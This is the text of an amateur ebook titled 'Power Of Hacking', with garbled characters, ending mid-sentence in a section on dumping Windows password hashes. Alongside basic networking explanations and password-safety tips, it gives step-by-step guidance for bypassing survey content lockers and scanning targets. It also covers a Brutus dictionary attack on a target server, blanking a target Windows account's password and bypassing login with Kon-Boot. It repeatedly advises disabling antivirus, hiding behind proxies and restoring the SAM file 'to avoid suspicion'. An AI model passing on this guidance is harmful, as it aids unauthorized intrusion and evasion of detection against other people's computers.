Power Of Hacking
BYPASS OR REMOVE SURVEYS, CONTENT LOCKER METHODS How to Bypass Website Surveys? If you want to bypass surveys on some content locked sites this is good 3 methods: Method 1 :- Go to http://surveybypass.com/
and enter the URL of the website that’s asking the site survey. Now you have the options to download it.
Method 2 :- Disable Javascript on Web-Browsers Disabling Javascript on Web-Browsers will make surveys never appear: In Google Chrome: 1) Click on Settings On the top right of Google Chrome. 2) Click Options. 3) Scroll down, and Click Advanced System Settings 4) Click on Content Settings to show options of Google Chrome web page content. Mail:mtahirzahid@yahoo.com
Page 1
Power Of Hacking 5) Under Javascript section check the box: Do not allow any site to run Javascript
6) Now just go the website that asks for surveys and you’ll bypass them. Method 3 : 1) When you are prompted to take a survey, Right Click the title and Click Inspect Element 2) Now keep pressing Delete button to delete scripts on Inspect Element tab, until Complete a Survey disappear
3) After the bar disappear, keep deleting until the Page go lighter (whiten) with no dark area. 4) Done! Now you’ll see your full content or download on Fileice. HACKER CLASSIFICATION Based on the attitude and skill level they possess, hackers are classified into the following types: White Hat Hacker: A white hat hacker (also known as ethical hacker) is someone who uses his skills only for defensive purposes such as penetration testing. These Mail:mtahirzahid@yahoo.com
Page 2
Power Of Hacking type of hackers are often hired by many organizations in order to ensure the security of their information systems. Black Hat Hacker: A black hat hacker (also known as cracker) is someone who always uses his skills for offensive purposes. The intention of black hat hackers is to gain money or take personal revenge by causing damage to information systems. Grey Hat Hacker: A grey hat hacker is someone who falls in between the white hat and black hat category. This type of hacker may use his skills both for defensive and offensive purposes. Script Kiddie: A script kiddie is a wannabe hacker. These are the ones who lack the knowledge of how a computer system really works but use ready-made programs, tools and scripts to break into computers. COMPUTER NETWORK A computer network is a group of two or more computers linked together so that communication between individual computers is made possible. Some of the common types of computer network include: Local Area Network (LAN) This is a type of computer network where interconnected computers are situated very close to each other say for example, inside the same building. Wide Area Network (WAN) This is a type of computer network where interconnected computers are separated by a large distance (a few km to few hundreds of km) and are connected using telephone lines or radio waves. Internet The Internet is the largest network which interconnects various LANs and WANs. It is a global system of various interconnected computer networks belonging to government or private organizations. NETWORK HOST
Mail:mtahirzahid@yahoo.com
Page 3
Power Of Hacking A network host (or simply referred to as a host) can be any computer or network device connected to the computer network. This computer can be a terminal or a web server offering services to its clients. NETWORK PROTOCOL A network protocol (or just referred to as protocol) is a set of rules and conventions that are necessary for the communication between two network devices. For example, two computers on a network can communicate only if they agree to follow the protocols. The following are some of the most widely referred network protocols: Internet Protocol (IP Address) An Internet Protocol address (IP address) is a unique number assigned to each computer or device (such as printer) so that each of them can be uniquely identified on the network. Types of IP Address: Private IP Address: A private IP address is the one that is assigned to a computer on the Local Area Network (LAN). A typical example of private IP address would be something like: 192.168.0.2 Public IP Address: A public IP address is the one that is assigned to a computer connected to the Internet. An example public IP address would be something like: 59.93.115.125 In most cases a computer gets connected to the ISP network using a private IP. Once a computer is on the ISP network it will be assigned a public IP address using which the communication with the Internet is made possible. How to Find the IP Address of a Computer? Finding your public IP is extremely simple. Just type “what is my IP� on Google to see
Mail:mtahirzahid@yahoo.com
Page 4
Power Of Hacking your public IP address displayed in search results.
In order to find your private IP, just open the command prompt window (type cmd in the “Run” box) and enter the following command: ipconfig/all
This will display a long list of details about your computer’s network devices and their configuration. To see your private IP address, just scroll down to find something as “IPv4 Address” which is nothing but your private IP.
Hyper Text Transfer Protocol (HTTP) The Hyper Text Transfer Protocol provides a standard for communication between web browsers and the server. It is one of the most widely used protocol on the Internet for requesting documents such as web pages and images. Example: http://www.example.com File Transfer Protocol (FTP) The File Transfer Protocol provides a standard for transferring files between two computers on the network. FTP is most widely used in carrying out upload/download operations between a server and a workstation. Example:ftp://www.example.com Simple Main Transfer Protocol (SMTP) The Simple Mail Transfer Protocol provides a standard for sending e-mails from one
Mail:mtahirzahid@yahoo.com
Page 5
Power Of Hacking server to another. Most e-mail systems that send mail over the Internet use SMTP to exchange messages between the server. Telnet Telnet is a network protocol that allows you to connect to remote hosts on the Internet or on a local network. It requires a telnet client software to implement the protocol using which the connection is established with the remote computer. In most cases telnet requires you to have a username and a password to establish connection with the remote host. Occasionally, some hosts also allow users to make connection as a guest or public. After the connection is made, one can use text based commands to communicate with the remote host. The syntax for using the telnet command is as follows: telnet <hostname or IP> port Example:telnet 127.0.0.1 25 SSH (Secure Shell) SSH is a protocol similar to telnet which also facilitates connection to remote hosts for communication. However, SSH has an upper hand over telnet in terms of security. Telnet was primarily designed to operate within the local network and hence does not take care of security. On the other hand SSH manages to offer total security while connecting to remote hosts on a remote network or Internet. Akin to telnet SSH also uses a client software and requires a username and password to establish connection with the remote host. NETWORK PORT A computer may be running several services on it like HTTP (web server), SMTP, FTP and so on. Each of these services are uniquely identified by a number called network port (or simply referred to as port). If a computer wants to avail a specific service from another computer, it has to establish a connection to it on the exact port number where the intended service is running.
Mail:mtahirzahid@yahoo.com
Page 6
Power Of Hacking For example, if a terminal is to request a web document from a remote server using HTTP, it has to first establish a connection with the remote server on port 80 (HTTP service runs on port 80) before placing the request. In simple words, port numbers can be compared to door numbers where each door grants access to a specific service on a computer. The following table shows a list of popular services and their default port numbers: Name of Service/Protocol Port Number HTTP 80 FTP 21 SMTP 25 TELNET 23 SSH 22 FIREWALL Firewalls are basically a barrier between your computer (or a network) and the Internet (outside world). A firewall can be simply compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place. He may allow some visitors to enter while deny others whom he suspects of being intruders. Similarly a firewall is a software program or a hardware device that filters the information (packets) coming through the Internet to your personal computer or a computer network. How Firewall Works? Firewalls may decide to allow or block network traffic between devices based on the rules
Mail:mtahirzahid@yahoo.com
Page 7
Power Of Hacking that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules which are most suitable under normal circumstances, so that the user need not worry much about configuring the firewall. The operation of firewall is illustrated in the below figure
Personal firewalls are easy to install and use and hence preferred by end-users to secure their personal computers. However, in order to meet customized needs large networks and companies prefer those firewalls that have plenty of options to configure. For example, a company may set up different firewall rules for FTP servers, telnet servers and web servers. In addition, the company can even control how the employees connect to the Internet by blocking access to certain websites and restricting the transfer of files to other networks. Thus, in addition to security, a firewall can give the company a tremendous control over how people use their network. Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network: 1. Packet Filtering: In this method, packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded. 2. Stateful Inspection: This is a newer method that doesnâ&#x20AC;&#x2122;t analyze the contents of the packets. Instead, it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are Mail:mtahirzahid@yahoo.com
Page 8
Power Of Hacking allowed to travel further. Otherwise they are discarded. Firewall Configuration: Firewalls can be configured by adding one or more filters based on several conditions as mentioned below: 1. IP addresses: In any case, if an IP address outside the network is said to be unfavourable, then it is possible to set filter to block all the traffic to and from that IP address. For example, if a certain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall. 2. Domain names: Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names. 3. Ports/Protocols: If the services running on a given port is intended for the public or network users, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections. 4. Specific words or phrases: A firewall can be configured to filter one or more specific words or phrases so that both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network. Hardware vs. Software Firewall: Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority. The software firewalls on the other hand are less
Mail:mtahirzahid@yahoo.com
Page 9
Power Of Hacking expensive and hence preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet at the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router. PROXY SERVER In a computer network, a proxy server is any computer system offering a service that acts as an intermediary between the two communicating parties, the client and the server. In the presence of a proxy server, there is no direct communication between the client and the server. Instead, the client connects to the proxy server and sends requests for resources such as a document, web page or a file that resides on a remote server. The proxy server handles this request by fetching the required resources from the remote server and forwarding the same to the client. How Proxy Server Works? An illustration of how a proxy server works is shown in the Figure . As shown in the below example, whenever the client connects to a web proxy server and makes a request for the resources (in this case, â&#x20AC;&#x153;Sample.htmlâ&#x20AC;?) that reside on a remote server (in this case, xyz.com), the proxy server forwards this request to the target server on behalf of the client so as to fetch the requested resource and deliver it back to the client. An example of client can be a user operated computer that is connected to the Internet.
A proxy server is most widely used to conceal the IP address or the origin of the Internet
Mail:mtahirzahid@yahoo.com
Page 10
Power Of Hacking users during their activity. Since it the proxy server which handles the requests between the client and the target, only the IP address of the proxy server is exposed to the outside world and not the actual one. Therefore, most hackers use a proxy server during the attacks on their target so that it would be hard to trace back to them. __________________________________________________________________________________ _
Linux Directory Structure:A directory structure is the way in which the file system and its files of an operating system are displayed to the user. People who are new to the Linux operating system and the structure of its File System often find it troublesome and messed up in dealing with the files and their location. So, let us begin to explore some of the basic information about Mail:mtahirzahid@yahoo.com
Page 11
Power Of Hacking the Linux File System. Any standard Linux distribution has the following directory structure as shown below:
Below is a brief description of the purpose and contents of each directory: / - ROOT Directory Every single file and the directory of the Linux file system starts from the root directory. Only “root” user has the write privilege to this directory. /bin - Binaries Contains executable binary files required for booting and repairing of the system. Also contains file and commands required to run in single user-mode such as: ls, ping, grep etc. /lib - System Libraries Contains system libraries and kernel modules required for the booting of the system. /dev - Device Files Contains device related files for all the hardware devices of the system. /etc - Configuration Files Contains configuration files required by all programs. It also contains start-up and shutdown shell scripts used to start or stop individual programs. /home - Home Directories This forms the “home directory” of individual users to store their personal information. Mail:mtahirzahid@yahoo.com
Page 12
Power Of Hacking Every time a new user is added, a new directory is created in the name of the user under “/home”. /user - User Programs This directory is used to store executable binaries, documentation, source-code files and libraries for second level programs. /tmp - Temporary Files Contains temporary files for system and users. /var - Variable Files Contains files whose size is expected to grow. Examples of such files include log files, print queues, lock files and temp files. SSH on Windows You can connect to a remote Linux machine even if you are using a Windows computer. This can be done using a small freeware program called PuTTY which is an SSH client and a terminal emulator for Windows. You can download it from the link below: Download PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html After the download, double-click on the application putty.exe, enter the hostname or IP address of the target machine, select the SSH option and click on the button “Open” as
shown in the below snapshot: should establish the connection with the remote Linux machine and ask you to enter
This
the Login as (username) followed by the password (will be invisible due to security reasons). Once you have entered the correct login details you will be able to execute commands on the target machine. Mail:mtahirzahid@yahoo.com
Page 13
Power Of Hacking Finding IP Address Location Finding out the physical location of the IP address is very simple. Just visit the following website and enter the target IP address to reveal its physical location: IP2Location: http://www.ip2location.com/demo A snapshot of sample query for the IP address 173.252.120.6 on ip2location.com website
is shown below: Finding IP Address Range While small websites may have a single IP address, big players such as Google, Facebook and Microsoft have a range of IP addresses allocated to their company for hosting additional websites and servers. This range of information can be obtained from the official website of American Registry for Internet Numbers (ARIN). The URL for the ARIN website is listed below: ARIN Website: https://www.arin.net/ Visit the above URL and insert the IP address of any given website in the â&#x20AC;&#x153;Search Whoisâ&#x20AC;? box found at the top right corner of the web page. Here is a snapshot showing the
Mail:mtahirzahid@yahoo.com
Page 14
Power Of Hacking results of a sample query performed on the Facebookâ&#x20AC;&#x2122;s IP address 173.252.120.6.
Traceroute Traceroute is a network diagnostic tool to identify the actual path (route) that the information (packets) takes to travel from source to destination. The source will be your own computer called localhost. The destination can be any host or server on the local network or Internet. The traceroute tool is available on both Windows and Linux. The command syntax for Windows is as follows: tracert target-domain-or-IP The command syntax for Linux is as follows: traceroute target-domain-or-IP Usually, the transfer of information from one computer to another will not happen in a single jump. It involves a chain of several computers and network devices called hops to transmit information from source to destination. Traceroute identifies each hop on that list and the amount of time it takes to travel from one hop to another. A snapshot of the
Mail:mtahirzahid@yahoo.com
Page 15
Power Of Hacking traceroute performed on “google.com” using a Windows computer is shown below:
As shown in the above snapshot, the traceroute tool identifies all the hops present in the path traversed by packets from source to destination. Here 192.168.0.1 is the private IP and 117.192.208.1 is the public IP of the source (my computer). 74.125.236.66 is the destination IP address (Google’s server). All the remaining IP addresses shown in between the source and the destination belong to computers that assist in carrying the information. DETECTING LIVE SYSTEMS The first step in the process of scanning is to determine whether the target is alive or not. This can be done using the ping tool that is readily available on both Windows and Linux computers. Just open the command prompt if you are on Windows or terminal window if you are on Linux and type ping followed by the target IP address as shown below: ping 173.252.120.6 If the target is alive and online, you should get a reply from the target or you if the target is not alive you will get a response saying “ping request cannot find the host”. Angry IP Scanner You can even ping a range of IP addresses all at once using a nice tool called “Angry IP Scanner”. It is an open-source cross-platform network scanner tool packed with several useful features. All you need to do is enter the starting and the ending IP of the range that you want to ping and click on the “Start” button as shown in the below figure. This should tell you
Mail:mtahirzahid@yahoo.com
Page 16
Power Of Hacking which of those IPs are available and which are not.
Angry IP Scanner is available for both Windows and Linux operating systems and can be downloaded from the link below: Angry IP Scanner: http://angryip.org/download/ Online Ping Tool If you would like to ping the target using a third party computer instead of yours, you can do so using online tools like Just-Ping which pings the target from 90 different geo locations worldwide. You can access Just-Ping tool from the link below: Just-Ping: http://cloudmonitor.ca.com/en/ping.php The following figure on the next page shows a sample ping test conducted using the
Just-Ping tool: TYPES OF SCANNING Now, let us discuss one by one some of the different types of scanning that are in place. Port Scanning
Mail:mtahirzahid@yahoo.com
Page 17
Power Of Hacking Port scanning involves sending a series of messages to the target computer to discover the types of network services running on it. Since each service is associated with a “well known” port number, performing a port scan on the target will reveal the ports that are open. So, when a port is said to be open the service associated with it is said to be active and running, thereby opening up the opportunity for the attacker to break into it. For example, if a port scan on the target shows that port 80 and port 25 are open, that means the target computer has a HTTP service (web server) and an SMTP service (email service) running on it respectively. Network Scanning Network scanning is a procedure for identifying active hosts on the target network either for the purpose of attacking them or for security assessment. In this way it would be possible for the hacker to make a list of vulnerable hosts for direct attack or to use them indirectly to attack other hosts. Vulnerability Scanning Vulnerability scanning involves the use of automated tools known as vulnerability scanners to proactively identify security vulnerabilities of computer systems in a network. These tools will scan the target to find out the presence of known flaws that are susceptible to exploits. TOOLS FOR SCANNING The following are some of the popular tools available for scanning: Nmap Nmap is a popular open-source tool for network discovery and security auditing that works on different platforms like Linux, Windows and Mac. It basically comes in the form of a command line interface; however, to facilitate the ease of use it is also available in a GUI format called Zenmap. For Windows machines, you can install the “self-installer” version of Nmap that comes in the “.exe” format. The download link for the same in available below:
Mail:mtahirzahid@yahoo.com
Page 18
Power Of Hacking Nmap Download: http://nmap.org/download.html After installing the tool, run the desktop shortcut to open the Zenmap window which typically looks as shown below:
The “Target” box needs to be filled with the target IP address or domain name on which you want to perform the scan. It also comes pre loaded with 10 different scan profiles that you can select from. Intense Scan This scan type should be reasonably quick as it only scans TCP ports. Additionally, it makes an attempt to detect the OS type, various services and their version numbers that are running on the target machine. Intense Scan Plus UDP It is the same Intense scan as described above but also includes scanning of UDP ports. Intense Scan, all TCP Ports Unlike the normal Intense scan which only scans a list of 1000 most common ports, the “Intense scan, all TCP ports” scans all available 65535 ports. Intense Scan, No Ping This option will exclude pinging the target from the Intense scan. You may use this option when you already know that the target is up or is blocking ping requests. Ping Scan Mail:mtahirzahid@yahoo.com
Page 19
Power Of Hacking This option will only ping the target but does not perform port scanning of any type. Quick Scan Scans faster than the Intense scan by limiting the number of TCP ports scanned to only the top 100 most common TCP ports. Quick Scan Plus Quick scan plus adds OS detection and a bit of version detection features to Quick scan. Quick Traceroute This option will show you the route that the packets take to reach the target starting with the localhost (source or your own computer). Regular Scan This will perform the ping and TCP port scan of 1000 default ports on the target. Slow Comprehensive Scan This scan will try all possible options to uncover as much information as it can about the target. It uses three different protocols: TCP, UDP and SCTP in order to detect hosts. Out of all the 10 scanning options, I reckon Intense Scan to be appropriate under most conditions. Just fill the “Target” box, select the “Intense scan” profile and hit the “Scan” button. Let us now analyze the Nmap result output by running it on a sample target. After the scan is completed the “Nmap Output” tab displays the raw output of all the scan operations such as the date and time it was performed, the results from ping scan,
Mail:mtahirzahid@yahoo.com
Page 20
Power Of Hacking discovered open ports, target OS and traceroute results as shown below:
The other tabs split the same results into an organized manner so as to display them in a more user friendly manner using GUI interface. The “Ports/Hosts” tab will display a list of discovered ports, their status as to whether they are closed or open, the protocol associated and the services running on them. A snapshot of the sample output is shown below:
The “Topology” tab displays the result of traceroute command in a graphical manner
Mail:mtahirzahid@yahoo.com
Page 21
Power Of Hacking showing each hop involved in the path.
The â&#x20AC;&#x153;Host Detailsâ&#x20AC;? tab shows the status of the host, its name, number of ports scanned, uptime, last boot time, type of operating system running including its version number and many other details as shown in the below figure:
NetScanTools Pro NetScanTools Pro is another wonderful program for Windows that has a powerful set of over 50 network tools including both automated and manual ways to retrieve information
Mail:mtahirzahid@yahoo.com
Page 22
Power Of Hacking
from the target. “Automated Tools” to quickly perform port scan and grab vital
You can use the
information about the target such as DNS records, Whois data, Traceroute details all from a single place. On the other hand the “Manual Tools” section contains individual tools specially crafted to give more control in the scanning process for advanced users. Online Tools You can also make use of online tools to perform port scan and discover important information about the target. The following are some of the links useful online network tools that are worth considering: PenTest-Tools YouGetSignal Other Popular Tools Here is a list of some of the other popular tools that you may want to explore: SuperScan ipEye Using a Proxy A proxy server can be used to conceal your real IP address while performing scanning and hack attempts on the target. Since the IP address tells everything about you, concealing it using a proxy can be highly effective in hiding your origin. Even though there are different types of proxies available, I recommend using a VPN proxy service to hide your IP address. VPN services are fast and provide reliable ways not only to hide your IP address but also to protect your data and identity over the Internet. Mail:mtahirzahid@yahoo.com
Page 23
Power Of Hacking Here are a few popular VPN services that you can try: HideMyAss Proxy VyprVPN Proxy Alternatively you can also use a chain of public proxies to further enhance your stealth operation using free tools like Proxifier and SocksChain. Please note that using public proxies can slow down your speed and hence VPN proxies are more recommended as they best serve the purpose. The other way to hide your identity is by using online tools for pinging and scanning the target. During the use of online tools, the IP address of the server hosting the tools is exposed to the target and not the one that belongs to the actual attacker. Once you have gathered a long list of information about the target through footprinting and scanning, it is time to analyze them for possible vulnerabilities in the operating system, technologies or services running on the target. You can make use of the following websites to find information about latest vulnerabilities and exploits: 1. http://www.securiteam.com 2. http://www.zone-h.org 3. http://www.securityfocus.com 4. http://www.packetstormsecurity.com 5. http://www.cybercrime.gov Hacking Passwords:1. Social Engineering: This type of technique involves psychological manipulation of people into performing actions that lead to the disclosure of their confidential information. In other words, social engineering is just a trick played by the hacker to gain the trust of people so that they reveal the password by themselves. Scenario-1: The hacker may call the target person by pretending himself as a bank official and ask him to confirm his password stating that this has to be done as a part of an ongoing verification program. In most cases, the target person on the other end
Mail:mtahirzahid@yahoo.com
Page 24
Power Of Hacking believes this and reveals his password to the hacker. Scenario-2: In order to avoid suspicion, instead of directly asking the victim to reveal the password, the hacker may obtain other vital information such as the “Date of Birth”, “Place of Birth”, “High School Details” etc. from the target person. Using these details, the hacker can easily reset the password and gain unauthorized access. Even though social engineering seems simple, it is proven that most people would easily fall victim to this attack. Lack of awareness among people is the prime reason for the success behind this trick. 2. Guessing: As most people are known to use easy to remember words such as their “pet’s name”, “phone number”, “child’s name” etc. as their passwords, it is often possible for the hacker to easily guess the password. 3. Shoulder surfing: It is the act of spying on one’s keyboard from behind the shoulders as a person types his/her password. This technique works well particularly in crowded areas such as cyber cafes and ATMs where people are usually unaware of what is happening behind their shoulders. After understanding some of the simple password hacking techniques, it is time to move on to the next level. Now, let us jump into some of the serious methods that hackers use to crack passwords: DICTIONARY ATTACK A dictionary attack is a type of password cracking technique where a long list of words from the dictionary is repeatedly tried against the target until the right match is found. This technique can be used to crack passwords that contain words found in the dictionary. Generally, the success of a dictionary attack is based on the fact that most people have a tendency to use easy to remember passwords that are found in the dictionary. However, if one uses a strong password with a combination of alphabets and numbers or introducing a slight variation to the actual spelling would make it impossible for the dictionary attack to crack such passwords.
Mail:mtahirzahid@yahoo.com
Page 25
Power Of Hacking One of my favourite tool to carry out the dictionary attack is Brutus. It is a remote online password cracker that works on Windows platform and can be downloaded from the following link: Brutus Download: http://www.hoobie.net/brutus/ NOTE: Some antivirus programs are known to have conflict with the Brutus application. So, it is recommend that you temporarily disable your antivirus before running the Brutus application. Now, let me give you a small demo on how to use Brutus. Here is a step-by-step procedure: 1. After downloading the tool from the above link, unzip the package into a new empty folder. 2. Run the “BrutusA2.exe” file to open the application as shown in the figure below:
3. Enter the IP address (or domain name) of the target server in the “Target” field. Select the type of password that you want to crack from the “Type” field or enter your own custom port number in the “Port” field”. 4. If you know the username for which you want hack the password for, then check the “Single User” option and enter the username in the “UserID” field. Otherwise leave the default settings to work as it is so that the username list is loaded from the “users.txt” file. Mail:mtahirzahid@yahoo.com
Page 26
Power Of Hacking 5. In the “Pass Mode” field select the option “Word List”. The list of words will be loaded from the “words.txt” file by default which contains around 800+ words. If you’ve a .TXT file that contains more words, then you can use that by selecting the “Browse” option. The more bigger the list is, better the chances of cracking the password. Below is an example of how a username and password list might look
like: the cracking process. Brutus will try every word
6. Now, hit the “Start” button to begin
in the password list for each of the usernames present in the username list. It will take a while for the process to complete and if you’re lucky, you should get a positive authentication response and the cracked password as shown in the below figure:
NOTE: It is always a smart idea to use a proxy before attempting this hacking process. This will prevent your real IP address from being stored in the logs of remote server and thus reduces the chances of being traced back.
Mail:mtahirzahid@yahoo.com
Page 27
Power Of Hacking RAINBOW TABLE A rainbow table is a pre-computed table that contains a long list of password hashes for dictionary words as well as alphanumeric permutation of words. The hacker initially generates a long list of password hashes and stores them in a rainbow table for later use. Although generating a rainbow table initially takes a long time and utilizes more storage space, once computed it can greatly reduce the time taken for the password cracking process. Any computer system that requires password authentication will maintain a table of usernames and passwords in its database. In case if the hacker manages to steal this table from the database, he would easily be in a position to gain access to a large number of accounts on the target system. In order to prevent this from happening, most systems store the passwords in a cryptographic hash format as opposed to plain text. For example, when a user completes the sign-up process on an online portal, the system may convert his password to MD5 hash format and store it in its database table. Suppose if the user has his password as goldfish, its MD5 hash would be as follows: MD5 Hash: 861836f13e3d627dfa375bdb8389214e Thereafter whenever the user tries to log into the portal, his password gets converted to the MD5 hash format on the fly and is compared against the existing hash in the database table. If both the hashes match, access is granted to the user. Now, even if the hacker manages to gain access to the database and steal the password table, he would only see a long list of cryptographic hashes and not the actual password. This is where rainbow tables come in handy. The hacker can use the rainbow tables to compare the long list of pre-computed hashes against the stolen list of password hashes. If the hashes match, the password would be the one that was initially used to generate the hash. Unlike a brute force approach where the hash is computed on every attempt, the rainbow table approach on the other hand utilizes a pre-computed list of hashes to directly compare
Mail:mtahirzahid@yahoo.com
Page 28
Power Of Hacking them against an existing password hash. As the time required to compute the hash on every attempt is cut down, the rainbow table approach takes significantly less time to complete the cracking process. A practical example of rainbow table approach will be discussed in the next chapter where we take up the topic of cracking Windows passwords. Social Engineering The measures needed to protect yourself from social engineering attacks are pretty simple and straight forward. Never disclose your password or any other personal information to anyone via phone or email. Attackers may even try to convince you by pretending to be an authorized person with whom you can share the personal details with. But remember that passwords are meant only to be entered on login pages and not to be shared with any person at all. Guessing and Shoulder Surfing Always make sure that your password does not contain your pet names, birth date, family member names or anything as such that are easy to be guessed. It is recommended that your password contains a combination of hard to guess words, numbers and special characters. As far as the shoulder surfing is concerned, you can avoid the same by making sure that no one else behind you is watching the movement of your fingers over the keyboard when your are typing the password. Dictionary Attack To protect yourself from a dictionary attack, all you need to do is make sure that your password does not contain words from dictionary. That means, your password is not something like “apple”, “lotus” or “mango”. Instead use words that are not in the dictionary. You can also use a phrase like str0ngpAss?? as your password so that it cannot be cracked using the dictionary attack approach. Brute-Force Attack and Rainbow Table
Mail:mtahirzahid@yahoo.com
Page 29
Power Of Hacking Brute-Force attacks often become successful when the passwords are short. That means, by keeping the password long enough you can make it hard for the attacker to crack it. Usually a password whose length is of 8 characters was considered long enough and safe in the past. However, this is not the case in the present day scenario as the modern computers have high speed processing capabilities to try thousands of guesses per second. So, in order to make your password immune to brute-force attack make sure it is larger than 8 characters and is a combinations of alphabets, numbers and special characters. You can avoid rainbow table attack on your passwords by making it too long. If your password is more than 12 or 14 characters, it would be extremely time consuming to create tables for them. This should keep you protected from such attacks. Phishing Attack You can avoid phishing attack by following the below mentioned guidelines: Do not respond to suspicious emails that ask you to give your personal information. If you are unsure whether an email request is legitimate, verify the same by calling the respective bank/company. Always use the telephone numbers printed on your bank records or statements and not those mentioned in the suspicious email. Do not use the links in an email, instant messenger or chat conversation to enter a website. Instead, always type the URL of the website on your browser’s address bar to get into a website. Legitimate websites always use a secure connection (https://) on those pages which are intended to gather sensitive information such as passwords, account numbers or credit card details. You will see a lock icon in your browser’s address bar which indicates a secure connection. On some websites like “PayPal” which uses an extended validation certificate, the address bar turns GREEN as shown below: Even if the login page is not secure (https://) the target website may still be legitimate. However, look for misspellings like www.papyal.com, www.payapl.com or paypal.somethingelse.com instead of the legitimate site www.paypal.com and Mail:mtahirzahid@yahoo.com
Page 30
Power Of Hacking make sure that the login details are only entered on the legitimate web page. Resetting the Windows Password If you wish to gain access to a Windows computer whose account is password protected, resetting the password is an easy option. Windows stores all its account information and encrypted passwords in a file called “SAM”. By modifying the “SAM” file it is possible to reset the password of any user account including that of the “administrator”. You can accomplish this task using a small open-source tool known as Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down and boot up the target computer using a CD or USB device such as thumb drive. The tool has the following features: You do not need to know the old password to set a new one. This tool will allow you to reset the password of any user account. This tool can also detect and unlock locked or disabled out user accounts. You can download the tool from the link below: Download: http://pogostick.net/~pnh/ntpasswd/ Resources to create a bootable CD and bootable USB device are available for download separately. Both works similarly and is a matter of your convenience. However, in this book I will give a demonstration of the USB version to reset the existing password. To create a bootable USB drive, download and unzip the USB version of the tool from the above link by following the simple instructions given in the readme.txt file. Once you have the bootable USB device in your hand, plug-in the device and boot from it. Make sure that you have enabled the USB boot option and set the top boot priority for your USB device in BIOS. Step-by-step instructions to complete the password reset
Mail:mtahirzahid@yahoo.com
Page 31
Power Of Hacking process is given below:
Once the tool is running from your USB device, you should see the screen similar to the one shown above. Just follow the screen instructions and the tool will automatically detect the partition on which the Windows is installed. Usually the right options are preloaded in the square bracket as shown in the below snapshot. So, just pressing Enter key should
work. step, you will be asked to “select which part of the registry to load”. You need
In the next
to select the option-1 that is “Password rest *sam+” which is preloaded by default as shown below. So just press Enter to proceed.
In the next step, select the option-1 which is “Edit user data and passwords” as shown below and hit Enter.
Now, you should see a list of “Usernames” and their “Admin” status being displayed.
Mail:mtahirzahid@yahoo.com
Page 32
Power Of Hacking Select the user who has administrator privilege and hit Enter.
In the next screen you will be asked to select from a list of options that you may want to perform on the selected user. Here, just select the option-1 which is “Clear (blank) user password” and hit Enter.
This should reset the password for the user account to make it go blank, so that the next time you reboot your Windows you should be able to login automatically as if there was no password set for that user account. Now quit editing user by pressing q and hit Enter until you proceed to the screen where you will be asked to confirm “writing back changes” to the SAM file. This step is very important where you need to press y and hit Enter as shown in the snapshot below. If you accidentally press Enter keeping the default option which is n, the reset process will fail and the whole procedure will have to be repeated again from the beginning. So, changing the default option from n to y before pressing Enter is very important.
This will complete the reset process where the existing password will be removed and set to blank. Disconnect the USB device and press CTRL+ALT+DEL to reboot the computer. Now, the Windows should let you login to the system without insisting to enter the password. Restoring the Password After Breach Resetting the password is a wonderful option to easily gain access to the password protected accounts. However, this method has a clear drawback as the password reset process is permanent. The administrator of the target machine will easily come to know Mail:mtahirzahid@yahoo.com
Page 33
Power Of Hacking about the security breach as thereafter no password will be asked during the login process. To overcome this drawback, we will have to device a means to restore everything back to normal once the purpose of breach is completed. For this we will have to take a backup of the original SAM file before modifying it in the password reset process and safely restore it back to make everything look normal. The SAM file is located in the drive where the Windows is installed (usually C:) under the following path: \windows\system32\config. You can easily access this location by booting up the computer from your live Kali Linux DVD. Once the Kali DVD is loaded, doubleclick the â&#x20AC;&#x153;Computer Iconâ&#x20AC;? present on the desktop to open up the explorer window. Now, navigate to the above location to find the SAM file and back it up to a different location such as a different drive or to your own USB device.
Now reboot the system and perform the password reset process as discussed earlier. Once you are done with your work, reboot the system again with Kali DVD and navigate to the location of SAM file. Rename the existing file to SAM.OLD and restore the original SAM file from the backup location. This should bring everything back to normal and avoid suspicion. Bypassing the Windows Authentication Process In the previous section we had discussed on how to reset the password to gain access to the system. But there is another smart way to gain access to the Windows system by Mail:mtahirzahid@yahoo.com
Page 34
Power Of Hacking silently bypassing the authentication process itself. This is done by applying temporary changes to the Windows kernel on the fly (while booting) to disable the authentication process. A tool called Kon-Boot allows you to accomplish this task. You can download it from the link below: Kon-Boot: http://www.piotrbania.com/all/kon-boot/ Kon-Boot is a handy tool that allows you to enter any password protected Windows user account without having to enter the password during the log-in process. The tool allows you to create a bootable CD or a USB drive. Once you boot the target computer from this bootable device, it will virtually modify parts of Windows kernel to load the operating system in a special mode where you will not be insisted to enter the password. The advantage of this tool is that all the changes are temporary and disappear after reboot, so that everything looks normal thereafter and does not arouse suspicion of a possible security breach. DUMPING THE PASSWORD HASHES After understanding some of the techniques to gain access to the system without knowing the password, it is time to move on one step further and find out a means to crack the actual password itself. If it is required to gain access to the target system multiple times over a period, it is always a good idea to unveil the password by cracking it so that you can easily login to the system by entering the password thereby eliminating the need to reset the password each time you want to gain access. Windows user account passwords are converted into a cryptographic hash format called NTLM (NT LAN MANAGER) hash. This NTLM hash along with the user profile details is stored in a special file called Security Accounts Manager or SAM. The SAM file is further encrypted with the syskey which is stored in a file called SYSTEM. Both SAM and SYSTEM are located in the drive where the Windows in installed (usually C:) under the following path: \windows\system32\config. In order to crack the password, it is necessary to extract the NTLM hash and user
Mail:mtahirzahid@yahoo.com
Page 35
